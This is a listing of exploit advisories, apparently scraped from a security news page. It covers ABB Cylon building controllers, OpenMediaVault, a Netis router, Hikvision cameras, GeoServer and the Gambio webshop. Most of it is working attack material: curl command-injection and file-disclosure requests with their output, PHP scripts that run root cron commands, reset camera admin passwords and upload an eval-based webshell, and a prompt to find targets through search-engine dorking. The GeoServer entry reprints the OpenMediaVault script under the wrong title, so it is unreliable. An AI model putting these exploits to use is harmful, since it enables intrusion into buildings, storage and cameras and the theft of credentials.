ABB Cylon Aspect versions 3.08.00 and below suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the timeserver HTTP POST parameter called by the setTimeServer.php script.

  
ABB Cylon Aspect 3.08.00 (setTimeServer.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'timeserver' HTTP POST parameter called by the  
setTimeServer.php script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5833  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5833.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST http://192.168.73.31/setTimeServer.php \  
> -d "timeserver=0.pool.ntp.org`cat /etc/passwd`"  
0.pool.ntp.orgroot:x:0:0:root:/home/root:/bin/sh

ABB Cylon Aspect 3.08.00 setTimeServer.php Remote Code Execution

ABB Cylon Aspect versions 3.08.01 and below suffer from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the logFile GET parameter via the logYumLookup.php script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

  
ABB Cylon Aspect 3.08.01 (logYumLookup.php) Unauthenticated File Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an unauthenticated arbitrary  
file disclosure vulnerability. Input passed through the 'logFile' GET parameter  
via the 'logYumLookup.php' script is not properly verified before being used  
to download log files. This can be exploited to disclose the contents of arbitrary  
and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5832  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5832.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/logYumLookup.php?logFile=user.properties  
#Users  
#Sat Apr 20 19:40:39 EDT 2024  
guest=6775657374  
test=74657374  
aamuser=64656661756c74

ABB Cylon Aspect 3.08.01 logYumLookup.php Unauthenticated File Disclosure

OpenMediaVault version 7.4.2-2 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : OpenMediaVault 7.4.2-2 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.openmediavault.org/                                                                                             |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+]  uses the CURL library for sending HTTP requests and handles JSON parsing for interaction with the OpenMediaVault API.[+] Line 148 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

OpenMediaVault 7.4.2-2 Code Injection

Netis MW5360 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Netis MW5360 Code Injection Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.netis-systems.com/products/MW5360.html                                                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 67 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass NetisRouterExploit {    private $targetUri;    private $cmdDelay;    public function __construct($targetUri = '/', $cmdDelay = 30) {        $this->targetUri = $targetUri;        $this->cmdDelay = $cmdDelay;    }    public function executeCommand($cmd) {        // Clean up payload file if command includes chmod        if (strpos($cmd, 'chmod +x') !== false) {            $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));        }        // Skip command removal for payload cleanup        if (strpos($cmd, 'rm -f') === false) {            $payload = base64_encode("`$cmd`");            echo "Executing $cmd\n";            $this->sendRequest('/cgi-bin/skk_set.cgi', [                'password' => $payload,                'quick_set' => 'ap',                'app' => 'wan_set_shortcut'            ]);        }    }    public function check() {        echo "Checking if target can be exploited.\n";        $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [            'mode_name' => 'skk_get',            'wl_link' => 0        ]);        if ($res === false || strpos($res['body'], 'version') === false) {            return "Unknown: No valid response received from target.";        }        preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);        if (isset($matches[2])) {            $version_number = strtoupper(trim(explode('-V', $matches[2])[1]));            $model_number = strtoupper(trim(explode('-V', $matches[2])[0]));            if (strpos($model_number, '-') !== false) {                $model_number = trim(explode('-', $model_number)[1]);            } else {                $model_number = trim(explode('(', $model_number)[1]);            }            if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {                return "Appears: Version " . $matches[2];            }            return "Safe: Version " . $matches[2];        }        return "Safe";    }    public function exploit() {        echo "Executing exploit with payload.\n";        $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);    }    private function sendRequest($uri, $postData) {        $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP        $options = [            'http' => [                'header'  => "Content-type: application/x-www-form-urlencoded\r\n",                'method'  => 'POST',                'content' => http_build_query($postData),            ],        ];        $context  = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === FALSE) {            return false;        }        return ['body' => $result];    }    private function registerFilesForCleanup($filename) {        echo "Registering $filename for cleanup.\n";        // Logic to clean up the file after execution.    }    private function executeCmdStager($options) {        echo "Executing command stager with options: " . print_r($options, true) . "\n";        // Implement the command stager logic here    }}// Usage$exploit = new NetisRouterExploit('/');$exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Netis MW5360 Code Injection

Hikvision IP Cameras suffer from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Hikvision IP Camera CSRF Add ADmin Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.hikvision.com/                                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The vulnerability has been present in Hikvision products since 2014.[+] add new admin.[+] Line 104 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass HikvisionExploit {    private $target;    private $port;    private $username;    private $password;    private $id;    private $storeCred;    public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {        $this->target = $target;        $this->port = $port;        $this->username = $username;        $this->password = $password;        $this->id = $id;        $this->storeCred = $storeCred;    }    public function check() {        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('GET', $url);        if (!$response) {            return 'No response received from the target!';        }        if ($response['http_code'] == 200) {            echo "Following users are available for password reset...\n";            $xml = simplexml_load_string($response['body']);            foreach ($xml->User as $user) {                echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";            }            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit() {        if ($this->check() !== 'Vulnerable') {            return false;        }        echo "Starting the password reset for {$this->username}...\n";        $postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" .            "<id>{$this->id}</id>\r\n" .            "<userName>{$this->username}</userName>\r\n" .            "<password>{$this->password}</password>\r\n</User>";        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('PUT', $url, $postData, 'application/xml');        if (!$response) {            echo "Target server did not respond to the password reset request\n";            return false;        }        if ($response['http_code'] == 200) {            echo "Password reset for {$this->username} was successfully completed!\n";            echo "Please log in with your new password: {$this->password}\n";            if ($this->storeCred) {                $this->reportCreds();            }        } else {            echo "Unknown Error. Password reset was not successful!\n";        }    }    private function sendRequest($method, $url, $data = null, $contentType = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if ($contentType) {            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['http_code' => $http_code, 'body' => $response];    }    private function generateRandomPassword($length = 10) {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);    }    private function reportCreds() {        // In a real implementation, you could store the credentials into a database        echo "Credentials for {$this->username} were added to the database...\n";    }}// Example usage$exploit = new HikvisionExploit('target-ip');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Hikvision IP Camera Cross Site Request Forgery

GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/geoserver/                                                                                               |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123  set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GeoServer 2.25.1 Code Injection

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gambio.com/                                                                                                     |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit {    private $targetUrl;    private $webshellName;    private $postParam;    private $getParam;    private $phpCmdFunction;    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {        $this->targetUrl = $targetUrl;        $this->phpCmdFunction = $phpCmdFunction;        $this->webshellName = $webshellName ?: $this->randomString() . '.php';        $this->postParam = $this->randomString();        $this->getParam = $this->randomString();    }    // Random string generator    private function randomString($length = 8) {        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    // Function to send HTTP POST request    private function sendPostRequest($uri, $data) {        $url = $this->targetUrl . $uri;        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => http_build_query($data),            ],        ];        $context = stream_context_create($options);        return file_get_contents($url, false, $context);    }    // Upload webshell to target    public function uploadWebshell() {        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $finalPayload = base64_encode(serialize([            "GuzzleHttp\\Cookie\\FileCookieJar" => [                "cookies" => [                    "GuzzleHttp\\Cookie\\SetCookie" => [                        "data" => [                            "Value" => $phpPayload,                            "Domain" => "target.com",                            "Path" => "/",                        ]                    ]                ],                "filename" => $this->webshellName            ]        ]));        $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [            'checkout_started' => 0,            'search' => $finalPayload,            'firstname' => 'test',            'lastname' => 'test',        ]);        echo "Webshell uploaded to: {$this->webshellName}\n";    }    // Execute PHP payload    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}", [            $this->postParam => $payload        ]);        echo "Executed command via webshell: {$cmd}\n";    }    // Execute command    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [            $this->postParam => $payload        ]);        echo "Executed command: {$cmd}\n";    }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gambio Online Webshop 4.9.2.0 Code Injection

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'SYSLOG' HTTP POST parameter called by the syslogSwitch.php script.

ABB Cylon Aspect 3.08.00 (syslogSwitch.php) Remote Code Execution

The ABB BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'Footer' HTTP POST parameter called by the caldavUtil.php script.

ABB Cylon Aspect 3.08.01 (caldavUtil.php) Remote Code Execution

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'timeserver' HTTP POST parameter called by the setTimeServer.php script.

Tag

#php